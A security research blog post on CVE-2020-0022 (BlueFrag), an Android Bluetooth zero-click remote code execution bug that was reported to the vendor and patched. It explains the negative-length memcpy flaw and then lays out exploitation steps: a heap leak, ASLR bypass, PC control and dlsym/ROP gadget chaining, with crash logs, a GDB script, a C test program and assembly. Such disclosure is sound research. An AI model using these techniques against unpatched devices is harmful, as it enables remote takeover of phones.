April 22, 2020 by Jan Ruge

CVE-2020-0022 an Android 8.0-9.0 Bluetooth Zero-Click RCE – BlueFrag

Nowadays, Bluetooth is an integral part of mobile devices. Smartphones interconnect with smartwatches and wireless headphones. By default, most devices are configured to accept Bluetooth connections from any nearby unauthenticated device. Bluetooth packets are processed by the Bluetooth chip (also called a controller), and then passed to the host (Android, Linux, etc.). Both the firmware on the chip and the host Bluetooth subsystem are targets for Remote Code Execution (RCE) attacks.

One feature that is available on most classic Bluetooth implementations is answering Bluetooth pings. All an attacker needs to know is the device’s Bluetooth address. Even if the target is not discoverable, it typically accepts connections if it gets addressed. For example, an attacker can run l2ping, which establishes an L2CAP connection and sends echo requests to the remote target.

In the following, we describe a Bluetooth zero-click short-distance RCE exploit against Android 9, which was assigned CVE-2020-0022. We go through all steps required to establish a remote shell on a Samsung Galaxy S10e, which was running an up-to-date Android 9 when we reported the issue on November 3, 2019. The initial flaw used for this exploit is still present in Android 10, but we utilize an additional bug in Bionic (Android’s libc implementation), which makes exploitation much easier. The bug was finally fixed in the security patch from February 1, 2020, in A-143894715.

Previous Work

During the work on InternalBlue and Frankenstein at SEEMOO, we spent a lot of time investigating the Broadcom Bluetooth firmware. InternalBlue was initially written by Dennis Mantz, and it interacts with the firmware to add debugging capabilities. Within this project, we did a lot of reverse engineering to understand the details of the firmware itself.

For further analysis, we built Frankenstein, which emulates the firmware for fuzzing. To achieve emulation, an essential part is understanding the Bluetooth Core Scheduler (BCS). This component is of interest, as it also processes the packet and payload header, and manages time-critical tasks. These low-level functions are not accessible from the host, and not even within the threaded components of the firmware itself. By accessing the BCS, we were even able to inject raw wireless frames into the emulated firmware.

When fuzzing with Frankenstein, we focused on vulnerabilities that arise prior to pairing. In these parts of the protocol, we found two vulnerabilities, one in classic Bluetooth and one in Bluetooth Low Energy (BLE). The first heap overflow is in the processing of Bluetooth scan results (EIR packets), affecting firmware with build dates in the range 2010-2018, possibly even older (CVE-2019-11516). For this, we provided a full RCE Proof-of-Concept (PoC) to Broadcom in April 2019. After the report, Broadcom claimed that they knew of the issue, and indeed, the newest Samsung Galaxy S10e had a patch that we were not aware of, as it had just been released. The second heap overflow affects all BLE Protocol Data Units (PDUs) since Bluetooth 4.2. We provided a PoC to Broadcom in June 2019, which corrupts the heap but misses one primitive that would be achieved with more data throughput. To the best of our knowledge, this issue has not been fixed as of February 2020.

While working on PoCs and ideas on how to get a lot of data into the heap, we also looked into classic Bluetooth Asynchronous Connection-Less (ACL) packets. These are primarily used for data transfer, such as music streaming, tethering, or, more generally, L2CAP. Within the firmware, ACL processing is comparatively simple. There are far more sophisticated handlers and proprietary protocol extensions. For example, Jiska Classen found a Link Management Protocol (LMP) type confusion (CVE-2018-19860).

Fuzzing ACL

The bug described in this post was triggered within ACL. We fuzzed this protocol by performing bit flips on the packet and payload header. The initial fuzzer was implemented by hooking the function bcs_dmaRxEnable within the firmware, which is invoked by the BCS ACL task. bcs_dmaRxEnable copies wireless frames into the transmit buffer. Prior to this function, the packet and payload headers are already written to the corresponding hardware registers. We are therefore able to modify the full packet before transmission and thus build a simple Bluetooth fuzzer within the firmware.

In the initial setup, we run l2ping on a Linux host against an Android device over-the-air, and the Bluetooth firmware fuzzer flips bits randomly in the headers. While we were trying to crash the firmware of the Android device, instead, the Android Bluetooth daemon crashed. In the logs, we observe several crash reports like this:

pid: 14808, tid: 14858, name: HwBinder:14808_  >>> com.android.bluetooth <<<
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x79cde00000
    x0  00000079d18360e1  x1  00000079cddfffcb  x2  fffffffffff385ef  x3  00000079d18fda60
    x4  00000079cdd3860a  x5  00000079d18360df  x6  0000000000000000  x7  0000000000000000
    x8  0000000000000000  x9  0000000000000000  x10 0000000000000000  x11 0000000000000000
    x12 0000000000000000  x13 0000000000000000  x14 ffffffffffffffff  x15 2610312e00000000
    x16 00000079bf1a02b8  x17 0000007a5891dcb0  x18 00000079bd818fda  x19 00000079cdd38600
    x20 00000079d1836000  x21 0000000000000097  x22 00000000000000db  x23 00000079bd81a588
    x24 00000079bd819c60  x25 00000079bd81a588  x26 0000000000000028  x27 0000000000000041
    x28 0000000000002019  x29 00000079bd819df0
    sp  00000079bd819c50  lr  00000079beef4124  pc  0000007a5891ddd4

backtrace:
    #00 pc 000000000001ddd4  /system/lib64/libc.so (memcpy+292)
    #01 pc 0000000000233120  /system/lib64/libbluetooth.so (reassemble_and_dispatch(BT_HDR*) [clone .cfi]+1408)
    #02 pc 000000000022fc7c  /system/lib64/libbluetooth.so (BluetoothHciCallbacks::aclDataReceived(android::hardware::hidl_vec<unsigned char> const&)+144)
    [...]

It seems that memcpy is executed with a negative length inside reassemble_and_dispatch. A simplified implementation of memcpy looks as follows:

void *memcpy(char *dst, const char *src, size_t n) {
  /* Copy n bytes one at a time; n is unsigned. */
  for (size_t i = 0; i < n; i++)
    dst[i] = src[i];
  return dst;
}

The length parameter n is of type size_t and, thus, an unsigned integer. If we pass a negative number as n, it will be interpreted as a large positive number because of the two's complement representation. As a result, memcpy tries to copy memory in a practically endless loop, which causes the crash as soon as we hit unmapped memory.

L2CAP Fragmentation

Bluetooth implements fragmentation on various layers. Within the analysis of this crash, we focus on the fragmentation of L2CAP packets passed between the controller and the host. For commands and configuration between host and controller, the Host Controller Interface (HCI) is used.

L2CAP is sent as ACL packets via the same UART wires as HCI. It needs to be fragmented to the maximum ACL packet length. During firmware initialization, the driver on the host queries this length with the HCI command Read Buffer Size. On Broadcom chips, this size is 1021. The host’s driver needs to respect these size limits when sending packets to the firmware. Similarly, the firmware also rejects L2CAP inputs that are not properly fragmented over the air. As fragmentation and reassembly happen on the host, but the firmware itself also has strict size limits, L2CAP is interesting for heap exploitation on the host and the controller.
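To make the fragmentation rule concrete, the following is a minimal Python sketch, not the Android or Broadcom implementation. It assumes the basic L2CAP header (16-bit length, 16-bit channel ID, little endian) and uses the packet boundary flag values that match the handle fields 0x200b and 0x100b quoted in this post. The function name fragment_l2cap and the 2500-byte payload are made up for illustration.

```python
import struct

ACL_MAX_LEN = 1021       # buffer size reported by Broadcom chips (from the text)
PB_START = 0b10          # packet boundary flag of a first fragment
PB_CONTINUATION = 0b01   # packet boundary flag of a continuing fragment

def fragment_l2cap(cid: int, payload: bytes, max_len: int = ACL_MAX_LEN):
    """Split one L2CAP frame into (pb_flag, chunk) pairs of at most max_len bytes."""
    # Basic L2CAP header: payload length and channel ID, both little endian.
    frame = struct.pack("<HH", len(payload), cid) + payload
    fragments = []
    for start in range(0, len(frame), max_len):
        flag = PB_START if start == 0 else PB_CONTINUATION
        fragments.append((flag, frame[start:start + max_len]))
    return fragments

# Hypothetical 2500-byte payload on the signaling channel (CID 0x0001).
frags = fragment_l2cap(0x0001, b"A" * 2500)
print([(flag, len(chunk)) for flag, chunk in frags])
# [(2, 1021), (1, 1021), (1, 462)]
```

The receiver has to undo exactly this split, which is where the reassembly logic discussed next comes in.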

If an L2CAP packet is received whose length exceeds the maximum buffer size of 1021, it has to be reassembled. The partial packet is stored in a map called partial_packets with the connection handle as the key. A buffer that is sufficiently large to hold the final packet is allocated, and the received data is copied to that buffer. The end of the last received fragment is stored in partial_packet->offset.

The following packets have the continuation flag set to indicate that this is a packet fragment. It is the 12th bit in the connection handle inside the ACL header. If such a packet is received, the packet content is then copied to the previous offset.

static void reassemble_and_dispatch(UNUSED_ATTR BT_HDR *packet) {
      [...]
      packet->offset = HCI_ACL_PREAMBLE_SIZE;
      uint16_t projected_offset =
          partial_packet->offset + (packet->len - HCI_ACL_PREAMBLE_SIZE);
      if (projected_offset >
          partial_packet->len) {  // len stores the expected length
        LOG_WARN(LOG_TAG,
             "%s got packet which would exceed expected length of %d."
             "Truncating.",
             __func__, partial_packet->len);
        packet->len = partial_packet->len - partial_packet->offset;
        projected_offset = partial_packet->len;
      }
      memcpy(partial_packet->data + partial_packet->offset,
         packet->data + packet->offset, packet->len - packet->offset);

      [...]
}

This step causes the negative length memcpy, as seen in the code above. Consider a situation where we receive a continuation while only 2 bytes are left to receive. If the continuation is longer than expected, packet->len is truncated to avoid buffer overflows. The length is set to the number of bytes that are left to copy.

As we need to skip the HCI and ACL preamble, we use HCI_ACL_PREAMBLE_SIZE (4) as the packet offset and subtract it from the number of bytes to copy. With packet->len already truncated to 2, this results in a negative length of 2 - 4 = -2 for memcpy.
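The arithmetic can be replayed with a small Python model of the length computation in the snippet above. This is only a sketch: the function name and the example numbers (an expected length of 100 with 98 bytes already received) are hypothetical, and the model assumes a 64-bit size_t.

```python
HCI_ACL_PREAMBLE_SIZE = 4
SIZE_T_MASK = (1 << 64) - 1   # assumption: 64-bit size_t, as on aarch64

def continuation_copy_length(partial_len, partial_offset, packet_len):
    """Return the memcpy length as (signed value, value seen as size_t).

    partial_len:    expected total length of the reassembled packet
    partial_offset: number of bytes stored so far
    packet_len:     length of the continuation, including the 4-byte preamble
    """
    packet_offset = HCI_ACL_PREAMBLE_SIZE
    # projected_offset is a uint16_t in the C code, hence the 16-bit mask.
    projected_offset = (partial_offset + (packet_len - HCI_ACL_PREAMBLE_SIZE)) & 0xFFFF
    if projected_offset > partial_len:
        # Truncation branch: len now counts only the remaining payload bytes.
        packet_len = partial_len - partial_offset
    # The preamble size is subtracted regardless of the truncation.
    signed_length = packet_len - packet_offset
    return signed_length, signed_length & SIZE_T_MASK

# Continuation with exactly the 2 missing bytes: a normal copy of 2 bytes.
print(continuation_copy_length(100, 98, 4 + 2))    # (2, 2)
# Continuation with 10 payload bytes although only 2 are expected.
signed, unsigned = continuation_copy_length(100, 98, 4 + 10)
print(signed, hex(unsigned))                       # -2 0xfffffffffffffffe
```

In this model the truncation branch replaces a length that included the preamble with one that does not, while the subtraction of the preamble stays in place.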

This has been addressed in master, but at the time of writing not in the android10-c2f2-release branch, the android10-dev branch, the android-10.0.0_r9 tag, or the android-9.0.0_r49 tag that was running on the S10e at that point in time. A fix has been deployed in android-8.0.0_r43, android-8.1.0_r73, android-9.0.0_r53 and android-10.0.0_r29.

Unexpected leak

The above-mentioned bug seems not to be exploitable, as we end up in an endless memcpy. Yet, we occasionally crash in completely different locations. For example, the following crash is located in the same thread, but cannot be explained with a simple infinite copy loop. Thus, we expected to find a different bug somewhere.

pid: 14530, tid: 14579, name: btu message loo  >>> com.android.bluetooth <<<
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x7a9e0072656761
    x0  0000007ab07d72c0  x1  0000007ab0795600  x2  0000007ab0795600  x3  0000000000000012
    x4  0000000000000000  x5  0000007a9e816178  x6  fefeff7a3ac305ff  x7  7f7f7f7f7fff7f7f
    x8  007a9e0072656761  x9  0000000000000000  x10 0000000000000020  x11 0000000000002000
    x12 0000007aa00fc350  x13 0000000000002000  x14 000000000000000d  x15 0000000000000000
    x16 0000007b396f6490  x17 0000007b3bc46120  x18 0000007a9e81542a  x19 0000007ab07d72c0
    x20 0000007ab0795600  x21 0000007a9e817588  x22 0000007a9e817588  x23 000000000000350f
    x24 0000000000000000  x25 0000007ab07d7058  x26 000000000000008b  x27 0000000000000000
    x28 0000007a9e817588  x29 0000007a9e816340
    sp  0000007a9e8161e0  lr  0000007a9fde0ca0  pc  0000007a9fe1a9a4

backtrace:
    #00 pc 00000000003229a4  /system/lib64/libbluetooth.so (list_append(list_t*, void*) [clone .cfi]+52)
    #01 pc 00000000002e8c9c  /system/lib64/libbluetooth.so (l2c_link_check_send_pkts(t_l2c_linkcb*, t_l2c_ccb*, BT_HDR*) [clone .cfi]+100)
    #02 pc 00000000002ea25c  /system/lib64/libbluetooth.so (l2c_rcv_acl_data(BT_HDR*) [clone .cfi]+1236)
    [...]

We spent a couple of sleepless nights tracking down these crashes and modified the fuzzing setup to be reproducible. However, it was not possible to reproduce these interesting crashes by replaying packets. The main issue during debugging was that we did not compile Android with an address sanitizer. This would have detected any memory corruption as it happens before crashing in a random location. So, in a moment of frustration, we decided to cheat a little bit. By keeping the payload of the L2Ping packets constant, we can compare it with the payload of the response. If the data changes meanwhile, a memory corruption took place but did not produce a crash yet. After running this for a while, we get corrupted responses like this:

With this detection method, we were even able to reproduce this behavior reliably. The following packet combination triggers it:

L2CAP packet containing ‘A’s, with 2 bytes remaining for the continuation
Continuation containing ‘B’s that is longer than the expected 2 bytes
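The detection method itself boils down to a byte-wise comparison of the constant echo payload with the payload of the response. A minimal sketch in Python, with a hypothetical helper name and made-up example bytes, could look like this:

```python
def corrupted_offsets(sent: bytes, received: bytes):
    """Return the offsets at which the echo response differs from the request."""
    offsets = [i for i, (s, r) in enumerate(zip(sent, received)) if s != r]
    # A length mismatch is reported as differences past the common prefix.
    shorter, longer = sorted((len(sent), len(received)))
    offsets.extend(range(shorter, longer))
    return offsets

# Hypothetical example: the last four bytes of the response were overwritten.
request = b"A" * 16
response = b"A" * 12 + b"\x0b\x20\x00\x00"
print(corrupted_offsets(request, response))   # [12, 13, 14, 15]
```

An empty result means the echo came back unchanged. Any other result indicates that memory was modified between reception and response, even though the daemon did not crash.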

In Android logcat, we can observe the following error message:

bt_hci_packet_fragmenter: reassemble_and_dispatch got packet which would
 exceed expected length of 147. Truncating.

This trigger looks similar to the bug described above. Note that only the last bytes are corrupted, whereas the beginning of the packet is still correct. This behavior cannot be explained by the source code and what we know so far. A straight buffer overflow that keeps the first couple of bytes intact or overwrites pointers and offsets in such a controlled manner is rather unlikely. At this point, we decided to set breakpoints in the packet_fragmenter to observe where the packet data is modified. We used the following GDB script to debug that behavior, where reassemble_and_dispatch+1408 and reassemble_and_dispatch+1104 are the two memcpy calls in reassemble_and_dispatch as described earlier.

b reassemble_and_dispatch
commands; x/32x $x0; c; end

b dispatch_reassembled
commands; x/i $lr; x/32x $x0; c; end

b *(reassemble_and_dispatch+1408)
commands; p $x0; p $x1;p $x2; c; end

b *(reassemble_and_dispatch+1104)
commands; p $x0; p $x1; p $x2; c; end

For the first packet containing ‘A’s, we can observe the following log. It is received as expected, and the first memcpy is triggered with a length of 0x52 bytes. This length is also visible in the BT_HDR struct inside the packet and is correct. The length included in the ACL and L2CAP header is two bytes longer than the actual payload in order to trigger packet reassembly. The connection handle in the HCI header is 0x200b and indicates a start packet for the connection handle 0x0b.

The second packet also arrives correctly in reassemble_and_dispatch. The connection handle has changed to 0x100b, which indicates a continuation packet. The third argument to memcpy is 0xfffffffffffffffe, that is -2, as pointed out above. As memcpy treats the third parameter as an unsigned integer, this memcpy should result in a crash.

But apparently, the application continues and corrupts the last 66 bytes of the partial packet and the corrupted packet is passed to dispatch_reassembled.
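The two handle values mentioned above, 0x200b and 0x100b, can be decoded with a few lines of Python. The sketch below follows the HCI ACL header layout, in which the lower 12 bits carry the connection handle and the next two bits carry the packet boundary flag. The function name is our own.

```python
def decode_acl_handle(field: int):
    """Split the 16-bit handle field of an HCI ACL header into its parts."""
    handle = field & 0x0FFF             # bits 0-11: connection handle
    pb_flag = (field >> 12) & 0x3       # bits 12-13: packet boundary flag
    bc_flag = (field >> 14) & 0x3       # bits 14-15: broadcast flag
    return handle, pb_flag, bc_flag

for field in (0x200B, 0x100B):
    handle, pb_flag, bc_flag = decode_acl_handle(field)
    kind = {0b10: "start", 0b01: "continuation"}.get(pb_flag, "other")
    print(hex(field), hex(handle), kind)
# 0x200b 0xb start
# 0x100b 0xb continuation
```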

memwtf(,,-2);

If we have a closer look at the actual memcpy implementation it is more complex than the simple character-wise memcpy shown above. It is more efficient to copy whole words of memory instead of individual bytes. This implementation takes it one step further and fills registers with 64 bytes of memory content before writing it to the target location. Such an implementation is more complex and has to consider edge cases such as odd lengths and misaligned addresses.

This memcpy implementation behaves unexpectedly for negative lengths. As we try to copy to the end of the destination buffer, we overwrite the last 66 bytes of the L2Ping request with whatever precedes our second packet. We have written this short PoC to test the memcpy behavior.

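#include <stdio.h>   /* printf */
#include <stdlib.h>  /* malloc, atoi, exit */
#include <string.h>  /* memcpy, memset */

int main(int argc, char **argv) {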
    if (argc < 3) {
        printf("usage %s offset_dst offset_src\n", argv[0]);
        exit(1);
    }

    char *src = malloc(256);
    char *dst = malloc(256);

    printf("src=%p\n", src);
    printf("dst=%p\n", dst);

    for (int i=0; i<256; i++) src[i] = i;
    memset(dst, 0x23, 256);

    memcpy( dst + 128 + atoi(argv[1]),
            src + 128 + atoi(argv[2]),
            0xfffffffffffffffe );

    //Hexdump
    for(int i=0; i<256; i+=32) {
        printf("%04x:  ", i);
        for (int j=0; j<32; j++) {
            printf("%02x", dst[i+j] & 0xff);
            if (j%4 == 3) printf(" ");
        }
        printf("\n");
    }
}

The behavior was analyzed in Unicorn emulating the aarch64 memcpy implementation. The relevant code is shown in the following:

prfm    PLDL1KEEP, [src]
add srcend, src, count
add dstend, dstin, count
cmp     count, 16
b.ls    L(copy16)           //Not taken as 0xfffffffffffffffe > 16
cmp count, 96
b.hi    L(copy_long)        //Taken as 0xfffffffffffffffe > 96

[...]

L(copy_long):
and tmp1, dstin, 15         //tmp1 = lower 4 bits of destination
bic dst, dstin, 15
ldp D_l, D_h, [src]
sub src, src, tmp1
add count, count, tmp1      /* Count is now 16 too large.  */
                            //It is not only too large
                            //but might also be positive!
                            //0xfffffffffffffffe + 0xe = 0xc
ldp A_l, A_h, [src, 16]
stp D_l, D_h, [dstin]
ldp B_l, B_h, [src, 32]
ldp C_l, C_h, [src, 48]
ldp D_l, D_h, [src, 64]!
subs    count, count, 128 + 16  /* Test and readjust count.  */
                                //This  will become negative again
b.ls    2f                      //So this branch is taken

[...]


/* Write the last full set of 64 bytes.  The remainder is at most 64
bytes, so it is safe to always copy 64 bytes from the end even if
there is just 1 byte left.  */
//This will finally corrupt -64...64 bytes and terminate
2:
ldp E_l, E_h, [srcend, -64]
stp A_l, A_h, [dst, 16]
ldp A_l, A_h, [srcend, -48]
stp B_l, B_h, [dst, 32]
ldp B_l, B_h, [srcend, -32]
stp C_l, C_h, [dst, 48]
ldp C_l, C_h, [srcend, -16]
stp D_l, D_h, [dst, 64]
stp E_l, E_h, [dstend, -64]
stp A_l, A_h, [dstend, -48]
stp B_l, B_h, [dstend, -32]
stp C_l, C_h, [dstend, -16]
ret
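The register arithmetic in this listing can be followed with a small Python model. It is only a sketch of the instructions quoted above, not of the complete memcpy, and the destination addresses in the usage lines are hypothetical. It computes whether the b.ls branch to the tail is taken and which byte ranges the quoted stp instructions would write in that case.

```python
MASK64 = (1 << 64) - 1

def model_copy_long(dstin: int, count: int):
    """Follow the quoted instructions for one destination address and count."""
    count &= MASK64
    dstend = (dstin + count) & MASK64     # add dstend, dstin, count
    tmp1 = dstin & 15                     # and tmp1, dstin, 15
    dst = dstin & ~15                     # bic dst, dstin, 15
    count = (count + tmp1) & MASK64       # add count, count, tmp1 (may wrap)
    # subs count, count, 128 + 16 ; b.ls 2f
    # b.ls means unsigned "lower or same", so it is taken if count <= 144.
    tail_taken = count <= 128 + 16
    # Half-open byte ranges [start, end) written on the path through label 2.
    writes = [
        (dstin, dstin + 16),              # stp D_l, D_h, [dstin]
        (dst + 16, dst + 80),             # stp A..D to [dst, 16] .. [dst, 64]
        (dstend - 64, dstend),            # stp E, A, B, C relative to dstend
    ]
    return tail_taken, writes

# Destination ending in 0xe, as in the comment 0xfffffffffffffffe + 0xe = 0xc.
taken, writes = model_copy_long(0x1000E, -2)
print(taken, [(hex(a), hex(b)) for a, b in writes])
# True [('0x1000e', '0x1001e'), ('0x10010', '0x10050'), ('0xffcc', '0x1000c')]

# With a 16-byte aligned destination the count does not wrap.
print(model_copy_long(0x10000, -2)[0])    # False
```

Under this model, the copy terminates only when the low four bits of the destination are at least 2. The last range shows that the final stores land directly below the destination pointer, which fits the observation that bytes in front of the intended copy target are overwritten.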

As we are dealing with a very large count value (0xfffffffffffffffe, that is SIZE_MAX - 1), it will always be larger than the distance between dst and src. Therefore __memcpy will never be called in our case, which makes this bug unexploitable on Android 10.

Leaking More Data

As described above, we can essentially overwrite the last 64 bytes of the packet with whatever happens to be in front of our source address. The first 20 bytes before the source buffer are always BT_HDR, acl_hdr, and l2cap_hdr. We therefore automatically leak the connection handle of the remote device.

The content of the uninitialized memory depends on the placement of the second packet buffer and therefore its size. By repeatedly sending regular L2Ping echo requests, we can try to place our own packet data in front of the second packet. This allows us to control the last 44 bytes of the packet with arbitrary data. By shortening the first packet, we can control the full packet struct including the headers. The first packet looks like the following:

After triggering the bug, the corrupted packet looks like the following. The packet containing the ‘X’ is the one we have placed in front of our source buffer. Note that, except for the length in BT_HDR, the packet length is now 0x280 instead of 0x30. The packet->len field must still hold the original length; otherwise, the reassemble method would expect further data.

This results in a much more useful leak. Note that this is a data-only attack without code execution or any other additional information required. It can also be used to inject arbitrary L2CAP traffic into any active connection handles. A successful leak might look as follows:

In order to defeat Address Space Layout Randomization (ASLR), we need the base address of some libraries. Occasionally we find an object from libicuuc.so on the heap, which has the following structure:

Some heap pointer
Pointer to uhash_hashUnicodeString_60 at libicuuc.so
Pointer to uhash_compareUnicodeString_60 at libicuuc.so
Pointer to uhash_compareLong_60 at libicuuc.so
Pointer to uprv_deleteUObject_60 at libicuuc.so

We can use the offsets between those functions to reliably detect this structure within the leak. This allows us to compute the base address of libicuuc.so.
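A search for this structure could be sketched in Python as follows. The symbol offsets below are placeholders, not the real offsets from any libicuuc.so build, and the sketch assumes that the leaked bytes are 8-byte aligned relative to the structure. The function name is hypothetical as well.

```python
import struct

# Placeholder offsets of the four functions inside libicuuc.so, in the order
# they appear in the structure. Real values depend on the target's library.
SYMBOL_OFFSETS = [0x1A2B40, 0x1A2C10, 0x1A2D00, 0x0F3E80]

def find_libicuuc_base(leak: bytes, offsets=SYMBOL_OFFSETS):
    """Scan the leak for four consecutive pointers with the expected spacing."""
    usable = len(leak) - len(leak) % 8
    words = struct.unpack("<%dQ" % (usable // 8), leak[:usable])
    for i in range(len(words) - len(offsets) + 1):
        base = words[i] - offsets[0]
        # A library base is page aligned; skip candidates that are not.
        if base <= 0 or base & 0xFFF:
            continue
        if all(words[i + k] - offsets[k] == base for k in range(len(offsets))):
            return base
    return None

# Self-test with a fabricated leak and a made-up base address.
fake_base = 0x7A58900000
fake_leak = (b"\x41" * 16
             + struct.pack("<Q", 0x7AB0795600)    # "some heap pointer"
             + b"".join(struct.pack("<Q", fake_base + o) for o in SYMBOL_OFFSETS)
             + b"\x42" * 8)
print(hex(find_libicuuc_base(fake_leak)))   # 0x7a58900000
```

Matching on the differences between the pointers rather than on absolute values is what makes the check independent of ASLR.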

PC Control and Payload Location

Several libraries, such as libbluetooth.so, are protected by Clang’s Control Flow Integrity (CFI) implementation. This protects forward edges and should prevent us from simply overwriting function vtables on the heap with arbitrary addresses. Only functions that belong to the affected object should be callable. Even so, upon disconnect, we occasionally trigger the following crash after corrupting the heap.

signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x37363534333231
    x0  3837363534333231  x1  000000750c2649e0  x2  000000751e50a338  x3  0000000000000000
    x4  0000000000000001  x5  0000000000000001  x6  00000075ab788000  x7  0000000001d8312e
    x8  00000075084106c0  x9  0000000000000001  x10 0000000000000001  x11 0000000000000000
    x12 0000000000000047  x13 0000000000002000  x14 000f5436af89ca08  x15 000024747b62062a
    x16 000000750c2f55d8  x17 000000750c21b088  x18 000000750a660066  x19 000000751e50a338
    x20 000000751e40dfb0  x21 000000751e489694  x22 0000000000000001  x23 0000000000000000
    x24 000000750be85f64  x25 000000750a661588  x26 0000000000000005  x27 00000075084106b4
    x28 000000750a661588  x29 000000750a65fd30
    sp  000000750a65fd10  lr  000000750c264bb8  pc  000000750c264c5c

backtrace:
    #00 pc 00000000000dbc5c  /system/lib64/libchrome.so (base::WaitableEvent::Signal()+200)
    #01 pc 00000000000add88  /system/lib64/libchrome.so (base::internal::IncomingTaskQueue::PostPendingTask(base::PendingTask*)+320)
    [...]
    #09 pc 00000000002dd0a8  /system/lib64/libbluetooth.so (L2CA_DisconnectRsp(unsigned short) [clone .cfi]+84)
    #10 pc 0000000000307a08  /system/lib64/libbluetooth.so (sdp_disconnect_ind(unsigned short, bool) [clone .cfi]+44)
    #11 pc 00000000002e39d4  /system/lib64/libbluetooth.so (l2c_csm_execute(t_l2c_ccb*, unsigned short, void*) [clone .cfi]+5500)
    #12 pc 00000000002eae04  /system/lib64/libbluetooth.so (l2c_rcv_acl_data(BT_HDR*) [clone .cfi]+4220)
    [...]

During the leak process, we do not only overflow into the negative direction, but also corrupt data that is stored after the affected buffer. In this particular case, we have overwritten a pointer that ends up in X0. Looking at the crash location in the code, we crash a few instructions before a branch to a register whose value is derived from X0.

dbc5c: f9400008 ldr x8, [x0] // We control X0
dbc60: f9400108 ldr x8, [x8]
dbc64: aa1403e1 mov x1, x20
dbc68: d63f0100 blr x8 // Branch to **X0
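The double dereference in this listing can be modelled in Python to see what a buffer has to contain so that blr x8 jumps to a chosen address. All addresses below are made up, and the offset 0x18 is simply the arbitrary value that the payload script later in this post also uses.

```python
import struct

PAYLOAD_BASE = 0x7AB0795600   # hypothetical heap address of our buffer
PC_OFFSET = 0x18              # arbitrary offset inside the buffer
GADGET = 0x7A58912344         # hypothetical address we want to branch to

payload = bytearray(0x40)
# First qword of the buffer: pointer to another slot inside the buffer.
struct.pack_into("<Q", payload, 0, PAYLOAD_BASE + PC_OFFSET)
# That slot holds the address execution should continue at.
struct.pack_into("<Q", payload, PC_OFFSET, GADGET)

def load64(address: int) -> int:
    """Read a little-endian 64-bit word from the modelled buffer."""
    return struct.unpack_from("<Q", payload, address - PAYLOAD_BASE)[0]

x0 = PAYLOAD_BASE     # we control x0 and let it point to our buffer
x8 = load64(x0)       # ldr x8, [x0]
x8 = load64(x8)       # ldr x8, [x8]
print(hex(x8))        # target of blr x8: 0x7a58912344
```

The model shows why knowing the absolute address of the buffer matters: the first load must yield a pointer that itself points to attacker-controlled memory.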

If we know an address where we can store arbitrary data, we can control pc! libchrome.so was not compiled with CFI enabled. Our packet data has to be stored on the heap somewhere, but we also need a way to retrieve the address, to gain RCE. This was achieved as the partial packets are stored in a hash map with the connection handle as a key:

BT_HDR* partial_packet =
         (BT_HDR*)buffer_allocator->alloc(full_length + sizeof(BT_HDR));
[...]
memcpy(partial_packet->data, packet->data, packet->len);
[...]
partial_packets[handle] = partial_packet;

This will allocate a map object on the heap, holding the key (handle) and a pointer to our packet. Eventually, we can leak this map object, revealing the pointer to our buffer. As the key is known, we can use it to detect this object in the leak. By using the maximum allowed packet size, we have a couple of hundred bytes to store our ROP chain and payload.

This overall method is not perfectly reliable but works in 30%-50% of the cases. However, the Bluetooth daemon is restarted automatically and forked by the same process, so the address space is only randomized on boot. Even if we crash the daemon, it is restarted with the same address layout, so an attacker can try over and over again to gain RCE.

Calling system();

Even though we know the absolute address of libicuuc.so, the offsets between the libraries are randomized as well. Therefore, we only have gadgets available in that library. libicuuc.so calls no interesting functions, such as system calls. At this point, Fabian Beterke pointed out that it would be a good idea to check the library imports for something interesting.

We have no direct use of system or execve, but we have dlsym available. This function requires a handle (e.g. a NULL pointer) and a function name as arguments. It resolves and returns the address of that function and can be used to obtain the address of system. Therefore, we need to perform a function call and return from it in a controlled way. In ROP, this is usually not a problem, as the gadgets have to end with a return anyway. However, we have no way to perform the stack pivot required for ROP. Thus, we have to use C++ object calls to perform the desired operations, which are often relative to X8 or X19. As a consequence, we have lots of relative references in our payload. To keep track of already used offsets, we implement a function called set_ptr(payload, offset, value) that throws an error if a given offset in the payload is already used. We also keep track of the register values in order to simplify the process.
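The exploit scripts are not reproduced here, so the following Python 3 sketch only illustrates what a helper like set_ptr might look like. The bookkeeping via a module-level set and the choice of ValueError are assumptions. Only the name and the argument order are taken from the text.

```python
import struct

_used_offsets = set()   # byte offsets of the payload that already hold data

def set_ptr(payload: bytearray, offset: int, value: int) -> None:
    """Write a little-endian 64-bit pointer and refuse to overwrite used bytes."""
    if offset < 0 or offset + 8 > len(payload):
        raise ValueError("offset 0x%x is outside the payload" % offset)
    span = range(offset, offset + 8)
    if any(o in _used_offsets for o in span):
        raise ValueError("offset 0x%x collides with an earlier pointer" % offset)
    struct.pack_into("<Q", payload, offset, value)
    _used_offsets.update(span)

# Usage with made-up addresses: two distinct slots work, an overlap is rejected.
buf = bytearray(0x100)
set_ptr(buf, 0x00, 0x7AB0795618)
set_ptr(buf, 0x18, 0x7A58912344)
try:
    set_ptr(buf, 0x1C, 0x4141414141414141)   # overlaps the slot at 0x18
except ValueError as err:
    print("rejected:", err)
```

Tracking individual bytes rather than slot start offsets also catches partially overlapping pointers, which are easy to produce when offsets are chosen by hand.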

To return cleanly from dlsym, we used a cleanup function called u_cleanup_60. It iterates over a list of function pointers: if a pointer is not NULL, it is called and then cleared. This is quite convenient, as we can call dlsym and control the execution after the return, without a stack pivot.

ldr x8, [x19, #0x40]; cbz x8, #0xbc128; blr x8; str xzr, [x19, #0x40];
ldr x8, [x19, #0x48]; cbz x8, #0xbc138; blr x8; str xzr, [x19, #0x48];
ldr x8, [x19, #0x50]; cbz x8, #0xbc148; blr x8; str xzr, [x19, #0x50];
ldr x8, [x19, #0x58]; cbz x8, #0xbc158; blr x8;

To set x19, let's first recap the preconditions:

x0 points to our buffer
We know the address of our buffer
The first address in our buffer is a pointer, that points to a pointer to our gadget

Furthermore, we have a list of gadgets in a text file, so we can grep for them. We can discard all gadgets that end with a ret instruction, as we can’t use them right now. There are still several gadgets left that end with a br register or blr register instruction and can be used. In addition, we need a gadget that loads data relative to x0, as this is the only register with a known value. So you might run something like this:

cat gadgets | grep -v ret | grep "ldr x., \[x0"

You might find a gadget that looks like this:

ldr x0, [x0, #8] ; ldr x8, [x0] ; ldr x2, [x8, #0x20] ; br x2

This gadget has two properties that make it useful:

It allows specifying the next gadget by using registers that we already have under control
It performs a useful operation: in this case, it sets x8 to point into our buffer.

